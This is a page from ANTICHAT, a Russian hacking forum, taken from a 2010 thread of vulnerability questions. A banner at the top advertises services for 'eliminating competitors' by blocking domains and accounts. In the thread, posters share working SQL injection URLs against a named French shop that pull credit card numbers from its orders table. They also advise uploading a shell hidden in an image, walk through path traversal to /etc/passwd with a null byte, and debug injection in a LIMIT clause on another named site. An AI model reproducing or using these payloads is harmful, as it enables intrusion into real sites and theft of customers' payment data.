УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1456 из 2438

1456

Опции темы

Поиск в этой теме

Опции просмотра

#14551

28.07.2010, 23:39

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от php_master

блин(( фигово.... енвирон не пашет, т.е. вообще нет /proc/self/environ а логи апача не грузятся из за их большого размера (((

есть альтернатива,попробуй залится через webalizer, если он там есть канешн.

или залей картинку с кодом шелла а потом заинклудь ее...

#14552

29.07.2010, 18:58

bmp152

Новичок

Регистрация: 25.05.2009

Сообщений: 15

Провел на форуме:
269065

Репутация: 6

Объясните плиз почему нет вывода из столба cc_number

Код:

http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and+1=0+Union+Select+1,2,cc_number,4,5,6,7,8+FROM+sweetsunnah.orders+LIMIT+1,1+--+

остальные нормально выводит, например

Код:

http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and+1=0+Union+Select+1,2,billing_country,4,5,6,7,8+FROM+sweetsunnah.orders+LIMIT+1,1+--+

п.с. пробелы вставил форум (and +1, FR OM, swe etsunnah)

#14553

29.07.2010, 19:15

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

потому что пустые там значения

Код:

http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and%20+1=0+Union+Select+1,2,group_concat%28cc_number%29,4,5,6,7,8+FROM+sweetsunnah.orders+--+

#14554

29.07.2010, 22:35

a66

Познающий

Регистрация: 02.04.2009

Сообщений: 30

Провел на форуме:
482796

Репутация: 1

Народ вопрос !В php injection плохо шарю но и время нету разбираться допустим есть сайт

http://site.com/?source=about?file=../../../../etc/passwd

получаеться вот так:

Warning: include(pages/about?file=../../../../etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /var/www/core/data/www/site.com/skin/skin.php on line 69

Warning: include() [function.include]: Failed opening 'pages/about?file=../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/core/data/www/site.com/skin/skin.php on line 69

из этого можно вообще что нить сделать?Зараннее спасибо

#14555

29.07.2010, 22:46

BrainDeaD

Постоянный

Регистрация: 09.06.2005

Сообщений: 531

Провел на форуме:
3516666

Репутация: 439

он автоматом ".php" добавляет. пробуй нульбайт (....passwd%00).

#14556

30.07.2010, 01:04

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от a66

Народ вопрос !В php injection плохо шарю но и время нету разбираться допустим есть сайт
http://site.com/?source=about?file=../../../../etc/passwd
получаеться вот так:
Warning: include(pages/about?file=../../../../etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /var/www/core/data/www/site.com/skin/skin.php on line 69
Warning: include() [function.include]: Failed opening 'pages/about?file=../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/core/data/www/site.com/skin/skin.php on line 69
из этого можно вообще что нить сделать?Зараннее спасибо

Во-первых, нужно так:

http://site.com/?source=/../../../../etc/passwd

%00

#14557

30.07.2010, 01:57

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

наткнулся на уязвимую (как мне показалось) страничку

http://www.punkradiocast.com/NEW10.php?start=3

подставляя кавычку, движок вываливает предупреждение и сам запрос к базе... делаем его корректным

http://www.punkradiocast.com/NEW10.php?start=3,3--+

после этого пытался сделать union select - не сработало... даже добавив к запросу and 1=1 имеем ошибку mysql, хотя логика запроса лично мне кажется верной

встречался с таким не один раз, в чем я ошибаюсь? и как построить sql inj в таком случае?

#14558

30.07.2010, 02:18

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

инъекия в лимите

Код:

...active = 1 ORDER BY date_created DESC, sort_name, title LIMIT 1 and 1=1, 3
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/punkradi/public_html/NEW10.php on line 48

#14559

30.07.2010, 02:43

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

Seravin, наверно я плохо объяснил... я имел ввиду запрос такого вида

http://www.punkradiocast.com/NEW10.php?start=3,3+and+1=1--+

#14560

30.07.2010, 02:57

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

какая разница, всё равно после лимита

Страница 1456 из 2438

1456

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход